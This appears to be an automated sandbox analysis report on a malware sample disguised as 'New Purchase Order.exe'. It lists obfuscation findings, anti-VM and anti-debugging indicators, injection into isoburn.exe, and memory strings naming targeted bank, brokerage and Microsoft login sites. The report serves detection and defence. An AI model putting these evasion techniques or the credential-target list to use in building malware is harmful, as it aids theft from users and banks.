                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, AsHAyVMLWwZ5pTIOYR.csHigh entropy of concatenated method names: 'OtqUVkAbdB', 'FMmUvKDjuf', 'aluUUVYfnP', 'r3BURmDyo5', 'S8eU1XuCE2', 'A7DUNx567r', 'Dispose', 'Ocq7mQJinc', 'R2m7hZlLya', 'XAo7cVsEy6'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, HkgQ1AqdtvsFLjtQSt.csHigh entropy of concatenated method names: 'tNyhd7yG4m', 'Xlhh2qNpGJ', 'o1QhJ9Lod3', 'GejhaA5372', 'vVjhHAvXWm', 'K4OhbYKgks', 'hYUhMgU5wT', 'I6qh6B9Wtb', 'gKKhpJMGTa', 'JTehwRQake'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, FyD1lGeySAK9BNlS24r.csHigh entropy of concatenated method names: 'ToString', 'z3BRqaNbuI', 'f1kRx1WxCI', 'uxBRumxVZ7', 'Cp9RT2WNRE', 'oZeR37Bu3D', 'fhMRj69pD6', 'i0WRCEuxFt', 'gOSxwmP8eFY2eMD7ISG', 'PynNsRPN3X9SCAvGQNe'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, JtvJJZTZSvBq0er8Mf.csHigh entropy of concatenated method names: 'sMFrFZPmCU', 'wQprhMYHQ7', 'gUsrXygJDb', 'kCTrQdUVTg', 'dMSr4rS5RD', 'O1gXHuMMNc', 'YjPXbN77Cf', 'cdjXMubXYA', 'jLSX69bKDc', 'OsEXpsiZvW'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, q7ujQVd9jv7d43rb8j.csHigh entropy of concatenated method names: 'HdtVLPR89w', 'KNqVs4vTHU', 'NEiVdLnyp7', 'kXVV2OVLBQ', 'vxcV3J22k2', 'gjFVj0ffx2', 'LTaVC60IPv', 's1UVDSTwMq', 'YCAVZZ8rFp', 'EUoVAyQv5W'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, yCcAiXyg9ZXAxSNZ6V.csHigh entropy of concatenated method names: 'svBtYFPuf', 'wkk9NkLB4', 'dyE5EwkaT', 'L5rGrVSMs', 'bEbxuKiOI', 'rwuuQDG3w', 'dK11jeniDRWtl66mdd', 'EFEqVWFRU7d38dg4BT', 'Bir7A062u', 'T8Hi1YgwY'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, iVjSQAxcT4jnFBtdDq.csHigh entropy of concatenated method names: 'XTec9ycZGp', 'epbc5dvmPN', 'w28cqISr2c', 'asAcxe04Ly', 'n6dcVmhWrt', 'v36c8WrZ0s', 'APCcvU5qBf', 'Yq2c7Lt03w', 'Kp9cUKjxxT', 'QMLci0iHx9'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, s88TJA4JmXfoe4olV8.csHigh entropy of concatenated method names: 'CC70FhgULg', 'f1x0mmEgXB', 'J900huY7kj', 'm680c4Dvr3', 'x5j0XOJl8D', 'POa0ryeDm5', 'CW80QL7RSm', 'f4204s0g3B', 'i820oD09a8', 'oRL0nGVgMS'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, TjSDcfw9GljCblN1nL.csHigh entropy of concatenated method names: 'p1eicfyWUD', 'dyViXxEevd', 'aUGir17IHC', 'OluiQGlIiX', 'Yu7iUpLZcR', 'hJFi4H7E3n', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, iwIHNBuVU5oPF3fBmj.csHigh entropy of concatenated method names: 'UC3XfvnHgZ', 'zQcXGxXKDj', 'XuJcj4Cs38', 'c0ycCoEZan', 'cBLcD0eR3F', 'iJ2cZ6wLSW', 'i1bcAJlUCJ', 'PdOcktNwOb', 'wRecO6g79b', 'MGXcL1kraO'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, CVhIXNeeM7Z5ed2VDv6.csHigh entropy of concatenated method names: 'SIiiwoq2mg', 'aqmizvtXKW', 'wq6RgNvfaC', 'GZjRecKFcm', 'lAlRy4tIf6', 'nYyR0fQCOy', 'JLiRPhG6WJ', 'HXeRFnaKn9', 'jrjRmglJuP', 'DdkRhU6eM3'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, qhENITEW3BZ7mGFrOg.csHigh entropy of concatenated method names: 'fACBqyvGIb', 'Tg9BxU63qM', 'y7qBTV1CSv', 'rGDB3UB0Yf', 'qc5BCjGQML', 'xf4BDUuKrG', 'J2jBAVEXAI', 'iZjBkYAyxc', 'ILaBLiTZQc', 'SFqBYEdN3N'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, gB1V3jpN6RgolYdvgi.csHigh entropy of concatenated method names: 'rl5UTlMEry', 'nFqU3eMrUl', 'ijNUj72wQs', 'F3EUCwYDrm', 'qJ4UDjjPKd', 'phfUZIs52v', 'cepUAQmq0v', 'LrPUkcfQWa', 'vPZUOxKsoo', 'onXULDwZDw'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, A2OkUgegImkk5aX6tFO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NGIiYtDZhd', 'AuCis1h6cx', 'RTAiEq1x99', 'N8uid18Vqf', 'ypUi2UtIKY', 'FVNiJL3ZJ3', 'OjTiaEmM4W'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, UUc1yLPNFZufg4ITiV.csHigh entropy of concatenated method names: 'Ef3eQkgQ1A', 'Qtve4sFLjt', 'LcTen4jnFB', 'zdDeSqXwIH', 'HfBeVmjDtv', 'SJZe8ZSvBq', 'X74R2dfXofxxWrUKdW', 'uhJcsoaFZHnD3esSmm', 'X3dee489i5', 'WCse0Bstgg'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, AJsvVvh1UfUTYYBkes.csHigh entropy of concatenated method names: 'Dispose', 'YZ5eppTIOY', 'TwFy3E2BG6', 'kWuIQJuFdl', 't71ewHljL5', 'xrhezZb9h2', 'ProcessDialogKey', 'WAhygB1V3j', 'w6RyegolYd', 'qgiyyajSDc'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, hRq8LeAQXOiqYAuqe1.csHigh entropy of concatenated method names: 'jRCQmVMhTt', 'crMQcsNugS', 'yKmQre15XW', 'F8arwJXo8e', 'l10rz68wjv', 'CJWQghLP3d', 'ykpQe5NjPD', 'l0cQySlBnT', 'S3GQ0ZdAbe', 'pFxQPpUshJ'
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, iVQApmeP3bSpDlwW7sT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QeclUc4qDV', 'G5sliFaY5e', 'wAslRUCwcc', 'lpill23MgY', 'mcol1AXnqw', 'OLslKVYaUi', 'KcRlNPYaMT'
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: New Purchase Order.exe PID: 6016, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 3030000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 32A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 3030000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 5820000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 6820000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 6950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 7950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 9F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: AF90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: BF90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: C420000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0173096E rdtsc 8_2_0173096E
                Source: C:\Users\user\Desktop\New Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 9629Jump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\isoburn.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\New Purchase Order.exe TID: 5296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7852Thread sleep count: 344 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7852Thread sleep time: -688000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7852Thread sleep count: 9629 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7852Thread sleep time: -19258000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FAC4E0 FindFirstFileW,FindNextFileW,FindClose,12_2_02FAC4E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: isoburn.exe, 0000000C.00000002.2507859774.0000000008551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CDYNVMware20,11696492231p
                Source: l420377x.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: l420377x.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: l420377x.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: l420377x.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: l420377x.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: l420377x.12.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: l420377x.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: l420377x.12.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: l420377x.12.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: l420377x.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: isoburn.exe, 0000000C.00000002.2507859774.0000000008551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rokers - EU WestVMware20,11696492231n
                Source: l420377x.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: isoburn.exe, 0000000C.00000002.2507859774.0000000008551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,1169649nF
                Source: l420377x.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: isoburn.exe, 0000000C.00000002.2507859774.0000000008551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l.comVMware20,11696492231h
                Source: l420377x.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: isoburn.exe, 0000000C.00000002.2507859774.0000000008551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,1ZE
                Source: l420377x.12.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: l420377x.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: l420377x.12.drBinary or memory string: discord.comVMware20,11696492231f
                Source: firefox.exe, 00000011.00000002.2117988161.000001ADBED0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBBklP
                Source: l420377x.12.drBinary or memory string: global block list test formVMware20,11696492231
                Source: l420377x.12.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: l420377x.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: l420377x.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: l420377x.12.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: l420377x.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: l420377x.12.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: isoburn.exe, 0000000C.00000002.2507859774.0000000008551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,1169649
                Source: l420377x.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: ILRIqlNpKN.exe, 0000000F.00000002.2503034440.0000000000FFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
                Source: l420377x.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003477000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI$m
                Source: l420377x.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: l420377x.12.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: l420377x.12.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: l420377x.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: l420377x.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: l420377x.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0173096E rdtsc 8_2_0173096E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00417723 LdrLoadDll,8_2_00417723
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C4164 mov eax, dword ptr fs:[00000030h]8_2_017C4164
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C4164 mov eax, dword ptr fs:[00000030h]8_2_017C4164
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01788158 mov eax, dword ptr fs:[00000030h]8_2_01788158
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EC156 mov eax, dword ptr fs:[00000030h]8_2_016EC156
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6154 mov eax, dword ptr fs:[00000030h]8_2_016F6154
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6154 mov eax, dword ptr fs:[00000030h]8_2_016F6154
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01784144 mov eax, dword ptr fs:[00000030h]8_2_01784144
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01784144 mov eax, dword ptr fs:[00000030h]8_2_01784144
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01784144 mov ecx, dword ptr fs:[00000030h]8_2_01784144
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01784144 mov eax, dword ptr fs:[00000030h]8_2_01784144
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01784144 mov eax, dword ptr fs:[00000030h]8_2_01784144
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01720124 mov eax, dword ptr fs:[00000030h]8_2_01720124
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179A118 mov ecx, dword ptr fs:[00000030h]8_2_0179A118
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179A118 mov eax, dword ptr fs:[00000030h]8_2_0179A118
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179A118 mov eax, dword ptr fs:[00000030h]8_2_0179A118
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179A118 mov eax, dword ptr fs:[00000030h]8_2_0179A118
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B0115 mov eax, dword ptr fs:[00000030h]8_2_017B0115
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017201F8 mov eax, dword ptr fs:[00000030h]8_2_017201F8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C61E5 mov eax, dword ptr fs:[00000030h]8_2_017C61E5
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E1D0 mov ecx, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B61C3 mov eax, dword ptr fs:[00000030h]8_2_017B61C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B61C3 mov eax, dword ptr fs:[00000030h]8_2_017B61C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177019F mov eax, dword ptr fs:[00000030h]8_2_0177019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177019F mov eax, dword ptr fs:[00000030h]8_2_0177019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177019F mov eax, dword ptr fs:[00000030h]8_2_0177019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177019F mov eax, dword ptr fs:[00000030h]8_2_0177019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AC188 mov eax, dword ptr fs:[00000030h]8_2_017AC188
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AC188 mov eax, dword ptr fs:[00000030h]8_2_017AC188
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01730185 mov eax, dword ptr fs:[00000030h]8_2_01730185
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EA197 mov eax, dword ptr fs:[00000030h]8_2_016EA197
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EA197 mov eax, dword ptr fs:[00000030h]8_2_016EA197
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EA197 mov eax, dword ptr fs:[00000030h]8_2_016EA197
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01794180 mov eax, dword ptr fs:[00000030h]8_2_01794180
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01794180 mov eax, dword ptr fs:[00000030h]8_2_01794180
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171C073 mov eax, dword ptr fs:[00000030h]8_2_0171C073
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01776050 mov eax, dword ptr fs:[00000030h]8_2_01776050
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F2050 mov eax, dword ptr fs:[00000030h]8_2_016F2050
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01786030 mov eax, dword ptr fs:[00000030h]8_2_01786030
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EA020 mov eax, dword ptr fs:[00000030h]8_2_016EA020
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EC020 mov eax, dword ptr fs:[00000030h]8_2_016EC020
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h]8_2_0170E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h]8_2_0170E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h]8_2_0170E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h]8_2_0170E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01774000 mov ecx, dword ptr fs:[00000030h]8_2_01774000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017320F0 mov ecx, dword ptr fs:[00000030h]8_2_017320F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F80E9 mov eax, dword ptr fs:[00000030h]8_2_016F80E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EA0E3 mov ecx, dword ptr fs:[00000030h]8_2_016EA0E3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017760E0 mov eax, dword ptr fs:[00000030h]8_2_017760E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EC0F0 mov eax, dword ptr fs:[00000030h]8_2_016EC0F0
